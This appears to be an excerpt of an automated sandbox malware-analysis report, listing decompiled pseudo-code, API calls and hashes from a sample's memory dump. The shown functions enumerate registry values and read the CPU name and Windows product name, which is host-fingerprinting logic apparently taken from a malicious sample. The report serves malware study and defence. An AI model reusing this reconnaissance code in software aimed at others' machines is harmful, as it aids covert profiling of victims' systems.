                                        0x29d8569b
                                        0x29d856a0
                                        0x29d856a7
                                        0x29d856aa
                                        0x29d856ad
                                        0x29d85632
                                        0x29d85636
                                        0x29d85636
                                        0x29d8563a
                                        0x29d8563c
                                        0x29d8563c
                                        0x29d8563e
                                        0x29d85646
                                        0x29d8564c
                                        0x29d85652
                                        0x29d85657
                                        0x29d85657
                                        0x29d856ae
                                        0x29d856b4
                                        0x29d856b7
                                        0x29d856b7
                                        0x29d856b7
                                        0x29d855fb
                                        0x29d855ed
                                        0x29d856c0
                                        0x29d856c5
                                        0x29d856cd
                                        0x29d856ce
                                        0x29d856d3
                                        0x29d856d9
                                        0x29d856da
                                        0x29d856df
                                        0x29d856e5
                                        0x29d856ed
                                        0x29d856ee
                                        0x29d856ef
                                        0x29d856fd

                                        APIs
                                          • Part of subcall function 29D85090: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,80000001,D9555F04), ref: 29D8510D
                                          • Part of subcall function 29D85090: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?), ref: 29D85163
                                        • lstrcatA.KERNEL32(00000000,29DCD628,D9555F04), ref: 29D855E5
                                        • lstrcatA.KERNEL32(00000000,00000004), ref: 29D85612
                                        • lstrcatA.KERNEL32(00000000, : ), ref: 29D85623
                                        • lstrcatA.KERNEL32(00000000,00000020), ref: 29D85646
                                        • lstrcatA.KERNEL32(00000000,00000000,?), ref: 29D8567A
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D856AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$EnumOpenValue
                                        • String ID: :
                                        • API String ID: 1373340110-3653984579
                                        • Opcode ID: 4375dd4ce7180049225aa17dee9fba7f860fa3dd211c8736362b4d231ea1bbd0
                                        • Instruction ID: 6a7773eafd9cd7e0562e115d710b645a489b5a5118e112a27c963e4be8ed2ff0
                                        • Opcode Fuzzy Hash: 4375dd4ce7180049225aa17dee9fba7f860fa3dd211c8736362b4d231ea1bbd0
                                        • Instruction Fuzzy Hash: 5F41B2B2941248EFCB11DF94D980EAFBBBAFF59740F50815DE50297605DB34AD02EBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA7CE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E29DA7CE0(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				signed int _t28;
				intOrPtr _t32;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t47;
				signed int _t48;
				char _t50;
				intOrPtr _t53;
				intOrPtr* _t65;
				signed int _t67;
				intOrPtr _t68;
				signed int _t70;

				_t65 = __edi;
				_push(0xffffffff);
				_push(E29DC1C88);
				_push( *[fs:0x0]);
				_t28 =  *0x29dd5664; // 0xd9555f04
				_push(_t28 ^ _t70);
				 *[fs:0x0] =  &_v16;
				E29DADA5D( &_v28, 0);
				_v8 = 0;
				_t50 =  *0x29dd8824; // 0x2bab2f48
				_v20 = _t50;
				if( *0x29de9034 == 0) {
					E29DADA5D( &_v24, 0);
					if( *0x29de9034 == 0) {
						_t47 =  *0x29dd6b04; // 0x3
						_t48 = _t47 + 1;
						 *0x29dd6b04 = _t48;
						 *0x29de9034 = _t48;
					}
					E29DADA85( &_v24);
				}
				_t67 =  *0x29de9034;
				_t32 =  *_t65;
				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
					_t53 = 0;
					goto L6;
				} else {
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
					if(_t53 != 0) {
						L10:
						_t68 = _t53;
						L11:
						if(_t68 != 0) {
							L19:
							_v8 = 0xffffffff;
							E29DADA85( &_v28);
							 *[fs:0x0] = _v16;
							return _t68;
						}
						L12:
						if(_t50 == 0) {
							_t36 = E29DA7F60(_t64,  &_v20, _t65);
							__eflags = _t36 - 0xffffffff;
							if(_t36 == 0xffffffff) {
								E29DAE158( &_v40, "bad cast");
								E29DAFF06( &_v40, 0x29dd20f4);
							}
							_t68 = _v20;
							 *0x29dd8824 = _t68;
							E29DADA5D( &_v24, 0);
							_t38 =  *((intOrPtr*)(_t68 + 4));
							__eflags = _t38 - 0xffffffff;
							if(_t38 < 0xffffffff) {
								_t41 = _t38 + 1;
								__eflags = _t41;
								 *((intOrPtr*)(_t68 + 4)) = _t41;
							}
							E29DADA85( &_v24);
							E29DAD6BC(__eflags, _t68);
						} else {
							_t68 = _t50;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t32 + 0x14)) == 0) {
						goto L10;
					}
					_t44 = E29DAD733();
					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
						goto L12;
					}
					_t64 =  *((intOrPtr*)(_t44 + 8));
					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
					goto L11;
				}
			}























                                        0x29da7ce0
                                        0x29da7ce3
                                        0x29da7ce5
                                        0x29da7cf0
                                        0x29da7cf6
                                        0x29da7cfd
                                        0x29da7d01
                                        0x29da7d0c
                                        0x29da7d11
                                        0x29da7d1f
                                        0x29da7d25
                                        0x29da7d28
                                        0x29da7d2f
                                        0x29da7d3b
                                        0x29da7d3d
                                        0x29da7d42
                                        0x29da7d43
                                        0x29da7d48
                                        0x29da7d48
                                        0x29da7d50
                                        0x29da7d50
                                        0x29da7d55
                                        0x29da7d5b
                                        0x29da7d60
                                        0x29da7d84
                                        0x00000000
                                        0x29da7d62
                                        0x29da7d65
                                        0x29da7d6a
                                        0x29da7d88
                                        0x29da7d88
                                        0x29da7d8a
                                        0x29da7d8c
                                        0x29da7df3
                                        0x29da7df6
                                        0x29da7dfd
                                        0x29da7e07
                                        0x29da7e14
                                        0x29da7e14
                                        0x29da7d8e
                                        0x29da7d90
                                        0x29da7d9b
                                        0x29da7da3
                                        0x29da7da6
                                        0x29da7db0
                                        0x29da7dbe
                                        0x29da7dbe
                                        0x29da7dc3
                                        0x29da7dcb
                                        0x29da7dd1
                                        0x29da7dd6
                                        0x29da7dd9
                                        0x29da7ddc
                                        0x29da7dde
                                        0x29da7dde
                                        0x29da7ddf
                                        0x29da7ddf
                                        0x29da7de5
                                        0x29da7deb
                                        0x29da7d92
                                        0x29da7d92
                                        0x29da7d92
                                        0x00000000
                                        0x29da7d90
                                        0x29da7d6c
                                        0x29da7d70
                                        0x00000000
                                        0x00000000
                                        0x29da7d72
                                        0x29da7d7a
                                        0x00000000
                                        0x00000000
                                        0x29da7d7c
                                        0x29da7d7f
                                        0x00000000
                                        0x29da7d7f

                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7D0C
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7D2F
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA7DB0
                                        • __CxxThrowException@8.LIBCMT ref: 29DA7DBE
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7DD1
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA7DEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: 6a2fce78189c2384ba08850af7c4b23dd6ecb1f9c3a15ab9470d0fbe985d8fd2
                                        • Instruction ID: 4b818ad56df6924ffdfad3a5f7b4b68b337dd0ca2efe36e5458a4a2ba387989a
                                        • Opcode Fuzzy Hash: 6a2fce78189c2384ba08850af7c4b23dd6ecb1f9c3a15ab9470d0fbe985d8fd2
                                        • Instruction Fuzzy Hash: A331D672D01144DFCB14DF54C990FAEB3B8EF24720F54825DD961A7A80DB346E16EBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA7E20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E29DA7E20(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				signed int _t28;
				intOrPtr _t32;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t47;
				signed int _t48;
				char _t50;
				intOrPtr _t53;
				intOrPtr* _t65;
				signed int _t67;
				intOrPtr _t68;
				signed int _t70;

				_t65 = __edi;
				_push(0xffffffff);
				_push(E29DC1C88);
				_push( *[fs:0x0]);
				_t28 =  *0x29dd5664; // 0xd9555f04
				_push(_t28 ^ _t70);
				 *[fs:0x0] =  &_v16;
				E29DADA5D( &_v28, 0);
				_v8 = 0;
				_t50 =  *0x29dd8828; // 0x2bab2f70
				_v20 = _t50;
				if( *0x29de9038 == 0) {
					E29DADA5D( &_v24, 0);
					if( *0x29de9038 == 0) {
						_t47 =  *0x29dd6b04; // 0x3
						_t48 = _t47 + 1;
						 *0x29dd6b04 = _t48;
						 *0x29de9038 = _t48;
					}
					E29DADA85( &_v24);
				}
				_t67 =  *0x29de9038;
				_t32 =  *_t65;
				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
					_t53 = 0;
					goto L6;
				} else {
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
					if(_t53 != 0) {
						L10:
						_t68 = _t53;
						L11:
						if(_t68 != 0) {
							L19:
							_v8 = 0xffffffff;
							E29DADA85( &_v28);
							 *[fs:0x0] = _v16;
							return _t68;
						}
						L12:
						if(_t50 == 0) {
							_t36 = E29DA8020( &_v20, _t65);
							__eflags = _t36 - 0xffffffff;
							if(_t36 == 0xffffffff) {
								E29DAE158( &_v40, "bad cast");
								E29DAFF06( &_v40, 0x29dd20f4);
							}
							_t68 = _v20;
							 *0x29dd8828 = _t68;
							E29DADA5D( &_v24, 0);
							_t38 =  *((intOrPtr*)(_t68 + 4));
							__eflags = _t38 - 0xffffffff;
							if(_t38 < 0xffffffff) {
								_t41 = _t38 + 1;
								__eflags = _t41;
								 *((intOrPtr*)(_t68 + 4)) = _t41;
							}
							E29DADA85( &_v24);
							E29DAD6BC(__eflags, _t68);
						} else {
							_t68 = _t50;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t32 + 0x14)) == 0) {
						goto L10;
					}
					_t44 = E29DAD733();
					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
						goto L12;
					}
					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
					goto L11;
				}
			}























                                        0x29da7e20
                                        0x29da7e23
                                        0x29da7e25
                                        0x29da7e30
                                        0x29da7e36
                                        0x29da7e3d
                                        0x29da7e41
                                        0x29da7e4c
                                        0x29da7e51
                                        0x29da7e5f
                                        0x29da7e65
                                        0x29da7e68
                                        0x29da7e6f
                                        0x29da7e7b
                                        0x29da7e7d
                                        0x29da7e82
                                        0x29da7e83
                                        0x29da7e88
                                        0x29da7e88
                                        0x29da7e90
                                        0x29da7e90
                                        0x29da7e95
                                        0x29da7e9b
                                        0x29da7ea0
                                        0x29da7ec4
                                        0x00000000
                                        0x29da7ea2
                                        0x29da7ea5
                                        0x29da7eaa
                                        0x29da7ec8
                                        0x29da7ec8
                                        0x29da7eca
                                        0x29da7ecc
                                        0x29da7f33
                                        0x29da7f36
                                        0x29da7f3d
                                        0x29da7f47
                                        0x29da7f54
                                        0x29da7f54
                                        0x29da7ece
                                        0x29da7ed0
                                        0x29da7edb
                                        0x29da7ee3
                                        0x29da7ee6
                                        0x29da7ef0
                                        0x29da7efe
                                        0x29da7efe
                                        0x29da7f03
                                        0x29da7f0b
                                        0x29da7f11
                                        0x29da7f16
                                        0x29da7f19
                                        0x29da7f1c
                                        0x29da7f1e
                                        0x29da7f1e
                                        0x29da7f1f
                                        0x29da7f1f
                                        0x29da7f25
                                        0x29da7f2b
                                        0x29da7ed2
                                        0x29da7ed2
                                        0x29da7ed2
                                        0x00000000
                                        0x29da7ed0
                                        0x29da7eac
                                        0x29da7eb0
                                        0x00000000
                                        0x00000000
                                        0x29da7eb2
                                        0x29da7eba
                                        0x00000000
                                        0x00000000
                                        0x29da7ebf
                                        0x00000000
                                        0x29da7ebf

                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E4C
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E6F
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA7EF0
                                        • __CxxThrowException@8.LIBCMT ref: 29DA7EFE
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7F11
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA7F2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: f0b5df5633a1167ce0aa9a71e157912708c5e3feea2bf838b0be31d0e362e896
                                        • Instruction ID: 6a069c61c03413cfb048f1eeddb8389c21c1339adef3ff2c67110e64c9eaae23
                                        • Opcode Fuzzy Hash: f0b5df5633a1167ce0aa9a71e157912708c5e3feea2bf838b0be31d0e362e896
                                        • Instruction Fuzzy Hash: 7731B272C002459BCB14DF54C990B9EB3B8EF24720F50825DD965A7A80DB346F16EBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA2340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E29DA2340(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				signed int _t28;
				intOrPtr _t32;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t47;
				signed int _t48;
				char _t50;
				intOrPtr _t53;
				intOrPtr* _t65;
				signed int _t67;
				intOrPtr _t68;
				signed int _t70;

				_t65 = __edi;
				_push(0xffffffff);
				_push(E29DC1C88);
				_push( *[fs:0x0]);
				_t28 =  *0x29dd5664; // 0xd9555f04
				_push(_t28 ^ _t70);
				 *[fs:0x0] =  &_v16;
				E29DADA5D( &_v28, 0);
				_v8 = 0;
				_t50 =  *0x29dd881c; // 0x2bab2a30
				_v20 = _t50;
				if( *0x29dd6b08 == 0) {
					E29DADA5D( &_v24, 0);
					if( *0x29dd6b08 == 0) {
						_t47 =  *0x29dd6b04; // 0x3
						_t48 = _t47 + 1;
						 *0x29dd6b04 = _t48;
						 *0x29dd6b08 = _t48;
					}
					E29DADA85( &_v24);
				}
				_t67 =  *0x29dd6b08; // 0x1
				_t32 =  *_t65;
				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
					_t53 = 0;
					goto L6;
				} else {
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
					if(_t53 != 0) {
						L10:
						_t68 = _t53;
						L11:
						if(_t68 != 0) {
							L19:
							_v8 = 0xffffffff;
							E29DADA85( &_v28);
							 *[fs:0x0] = _v16;
							return _t68;
						}
						L12:
						if(_t50 == 0) {
							_t36 = E29D98B30( &_v20, _t65);
							__eflags = _t36 - 0xffffffff;
							if(_t36 == 0xffffffff) {
								E29DAE158( &_v40, "bad cast");
								E29DAFF06( &_v40, 0x29dd20f4);
							}
							_t68 = _v20;
							 *0x29dd881c = _t68;
							E29DADA5D( &_v24, 0);
							_t38 =  *((intOrPtr*)(_t68 + 4));
							__eflags = _t38 - 0xffffffff;
							if(_t38 < 0xffffffff) {
								_t41 = _t38 + 1;
								__eflags = _t41;
								 *((intOrPtr*)(_t68 + 4)) = _t41;
							}
							E29DADA85( &_v24);
							E29DAD6BC(__eflags, _t68);
						} else {
							_t68 = _t50;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t32 + 0x14)) == 0) {
						goto L10;
					}
					_t44 = E29DAD733();
					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
						goto L12;
					}
					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
					goto L11;
				}
			}























                                        0x29da2340
                                        0x29da2343
                                        0x29da2345
                                        0x29da2350
                                        0x29da2356
                                        0x29da235d
                                        0x29da2361
                                        0x29da236c
                                        0x29da2371
                                        0x29da237f
                                        0x29da2385
                                        0x29da2388
                                        0x29da238f
                                        0x29da239b
                                        0x29da239d
                                        0x29da23a2
                                        0x29da23a3
                                        0x29da23a8
                                        0x29da23a8
                                        0x29da23b0
                                        0x29da23b0
                                        0x29da23b5
                                        0x29da23bb
                                        0x29da23c0
                                        0x29da23e4
                                        0x00000000
                                        0x29da23c2
                                        0x29da23c5
                                        0x29da23ca
                                        0x29da23e8
                                        0x29da23e8
                                        0x29da23ea
                                        0x29da23ec
                                        0x29da2453
                                        0x29da2456
                                        0x29da245d
                                        0x29da2467
                                        0x29da2474
                                        0x29da2474
                                        0x29da23ee
                                        0x29da23f0
                                        0x29da23fb
                                        0x29da2403
                                        0x29da2406
                                        0x29da2410
                                        0x29da241e
                                        0x29da241e
                                        0x29da2423
                                        0x29da242b
                                        0x29da2431
                                        0x29da2436
                                        0x29da2439
                                        0x29da243c
                                        0x29da243e
                                        0x29da243e
                                        0x29da243f
                                        0x29da243f
                                        0x29da2445
                                        0x29da244b
                                        0x29da23f2
                                        0x29da23f2
                                        0x29da23f2
                                        0x00000000
                                        0x29da23f0
                                        0x29da23cc
                                        0x29da23d0
                                        0x00000000
                                        0x00000000
                                        0x29da23d2
                                        0x29da23da
                                        0x00000000
                                        0x00000000
                                        0x29da23df
                                        0x00000000
                                        0x29da23df

                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA236C
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA238F
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA2410
                                        • __CxxThrowException@8.LIBCMT ref: 29DA241E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA2431
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA244B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: c21c820efad1e7f340574aa1ddd6744ef9271acb058916abe1e7c4f2036068ef
                                        • Instruction ID: 6d6706a5d4bab55ec3e7ba8af44f6630c6568f258cbb35c87cffc23523156379
                                        • Opcode Fuzzy Hash: c21c820efad1e7f340574aa1ddd6744ef9271acb058916abe1e7c4f2036068ef
                                        • Instruction Fuzzy Hash: B031E872800605DFCB04DF95C980B9E77B4EF25730F60825EDA61A7A90DB346E16EBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA2480 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E29DA2480(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				signed int _t28;
				intOrPtr _t32;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t47;
				signed int _t48;
				char _t50;
				intOrPtr _t53;
				intOrPtr* _t65;
				signed int _t67;
				intOrPtr _t68;
				signed int _t70;

				_t65 = __edi;
				_push(0xffffffff);
				_push(E29DC1C88);
				_push( *[fs:0x0]);
				_t28 =  *0x29dd5664; // 0xd9555f04
				_push(_t28 ^ _t70);
				 *[fs:0x0] =  &_v16;
				E29DADA5D( &_v28, 0);
				_v8 = 0;
				_t50 =  *0x29dd8820; // 0x0
				_v20 = _t50;
				if( *0x29de9030 == 0) {
					E29DADA5D( &_v24, 0);
					if( *0x29de9030 == 0) {
						_t47 =  *0x29dd6b04; // 0x3
						_t48 = _t47 + 1;
						 *0x29dd6b04 = _t48;
						 *0x29de9030 = _t48;
					}
					E29DADA85( &_v24);
				}
				_t67 =  *0x29de9030;
				_t32 =  *_t65;
				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
					_t53 = 0;
					goto L6;
				} else {
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
					if(_t53 != 0) {
						L10:
						_t68 = _t53;
						L11:
						if(_t68 != 0) {
							L19:
							_v8 = 0xffffffff;
							E29DADA85( &_v28);
							 *[fs:0x0] = _v16;
							return _t68;
						}
						L12:
						if(_t50 == 0) {
							_t36 = E29DA25C0( &_v20, _t65);
							__eflags = _t36 - 0xffffffff;
							if(_t36 == 0xffffffff) {
								E29DAE158( &_v40, "bad cast");
								E29DAFF06( &_v40, 0x29dd20f4);
							}
							_t68 = _v20;
							 *0x29dd8820 = _t68;
							E29DADA5D( &_v24, 0);
							_t38 =  *((intOrPtr*)(_t68 + 4));
							__eflags = _t38 - 0xffffffff;
							if(_t38 < 0xffffffff) {
								_t41 = _t38 + 1;
								__eflags = _t41;
								 *((intOrPtr*)(_t68 + 4)) = _t41;
							}
							E29DADA85( &_v24);
							E29DAD6BC(__eflags, _t68);
						} else {
							_t68 = _t50;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t32 + 0x14)) == 0) {
						goto L10;
					}
					_t44 = E29DAD733();
					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
						goto L12;
					}
					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
					goto L11;
				}
			}























                                        0x29da2480
                                        0x29da2483
                                        0x29da2485
                                        0x29da2490
                                        0x29da2496
                                        0x29da249d
                                        0x29da24a1
                                        0x29da24ac
                                        0x29da24b1
                                        0x29da24bf
                                        0x29da24c5
                                        0x29da24c8
                                        0x29da24cf
                                        0x29da24db
                                        0x29da24dd
                                        0x29da24e2
                                        0x29da24e3
                                        0x29da24e8
                                        0x29da24e8
                                        0x29da24f0
                                        0x29da24f0
                                        0x29da24f5
                                        0x29da24fb
                                        0x29da2500
                                        0x29da2524
                                        0x00000000
                                        0x29da2502
                                        0x29da2505
                                        0x29da250a
                                        0x29da2528
                                        0x29da2528
                                        0x29da252a
                                        0x29da252c
                                        0x29da2593
                                        0x29da2596
                                        0x29da259d
                                        0x29da25a7
                                        0x29da25b4
                                        0x29da25b4
                                        0x29da252e
                                        0x29da2530
                                        0x29da253b
                                        0x29da2543
                                        0x29da2546
                                        0x29da2550
                                        0x29da255e
                                        0x29da255e
                                        0x29da2563
                                        0x29da256b
                                        0x29da2571
                                        0x29da2576
                                        0x29da2579
                                        0x29da257c
                                        0x29da257e
                                        0x29da257e
                                        0x29da257f
                                        0x29da257f
                                        0x29da2585
                                        0x29da258b
                                        0x29da2532
                                        0x29da2532
                                        0x29da2532
                                        0x00000000
                                        0x29da2530
                                        0x29da250c
                                        0x29da2510
                                        0x00000000
                                        0x00000000
                                        0x29da2512
                                        0x29da251a
                                        0x00000000
                                        0x00000000
                                        0x29da251f
                                        0x00000000
                                        0x29da251f

                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA24AC
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA24CF
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA2550
                                        • __CxxThrowException@8.LIBCMT ref: 29DA255E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA2571
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA258B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: 4e0cb798a1c4472fe9de4b3c362eb1a38e6c6f8ab719149c4d71a4fef5be2492
                                        • Instruction ID: af283dd92ee02d36d538e0bec96718f2e73b0ded7a93530ef3fda5a6b1e0c695
                                        • Opcode Fuzzy Hash: 4e0cb798a1c4472fe9de4b3c362eb1a38e6c6f8ab719149c4d71a4fef5be2492
                                        • Instruction Fuzzy Hash: 2D31E572801245DFCB19DF54D990B9DB3B8FF24720F60825DDA11A7AC0DB34AE16EBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3010 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E29DA3010(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				void* _v524;
				int _v528;
				signed int _t14;
				void* _t26;
				void* _t34;
				void* _t35;
				signed int _t36;

				_t35 = __esi;
				_t34 = __edi;
				_t26 = __ebx;
				_t14 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t14 ^ _t36;
				_v528 = 0xff;
				_v264 = 0;
				E29DB5640( &_v263, 0, 0xfe);
				if(RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119,  &_v524) == 0) {
					RegQueryValueExA(_v524, "ProcessorNameString", 0, 0,  &_v264,  &_v528);
				}
				RegCloseKey(_v524);
				CharToOemA( &_v264,  &_v520);
				return E29DADF46( &_v520, _t26, _v8 ^ _t36, _v524, _t34, _t35);
			}














                                        0x29da3010
                                        0x29da3010
                                        0x29da3010
                                        0x29da3019
                                        0x29da3020
                                        0x29da3031
                                        0x29da303b
                                        0x29da3042
                                        0x29da306a
                                        0x29da308a
                                        0x29da308a
                                        0x29da3097
                                        0x29da30ab
                                        0x29da30c4

                                        APIs
                                        • _memset.LIBCMT ref: 29DA3042
                                        • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 29DA3062
                                        • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 29DA308A
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3097
                                        • CharToOemA.USER32(00000000,?), ref: 29DA30AB
                                        Strings
                                        • ProcessorNameString, xrefs: 29DA3084
                                        • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 29DA3058
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CharCloseOpenQueryValue_memset
                                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                        • API String ID: 2235053359-2804670039
                                        • Opcode ID: 878badf7c51ff0715829667180d2610769860b35d2ff267668f18dff510a4a65
                                        • Instruction ID: db0eea26ceb6b65914aa5ba2df7adffd5e3cb3c193f0a46470cd0527f1ac7bb0
                                        • Opcode Fuzzy Hash: 878badf7c51ff0715829667180d2610769860b35d2ff267668f18dff510a4a65
                                        • Instruction Fuzzy Hash: 1B11CCB654031CABD764DF50DD89FDAB3B8DB14700F4041D8E619A7181DA745A859F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA33A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E29DA33A0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				void* _v524;
				int _v528;
				signed int _t14;
				void* _t26;
				void* _t34;
				void* _t35;
				signed int _t36;

				_t35 = __esi;
				_t34 = __edi;
				_t26 = __ebx;
				_t14 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t14 ^ _t36;
				_v528 = 0xff;
				_v264 = 0;
				E29DB5640( &_v263, 0, 0xfe);
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119,  &_v524) == 0) {
					RegQueryValueExA(_v524, "ProductName", 0, 0,  &_v264,  &_v528);
				}
				RegCloseKey(_v524);
				CharToOemA( &_v264,  &_v520);
				return E29DADF46( &_v520, _t26, _v8 ^ _t36, _v524, _t34, _t35);
			}














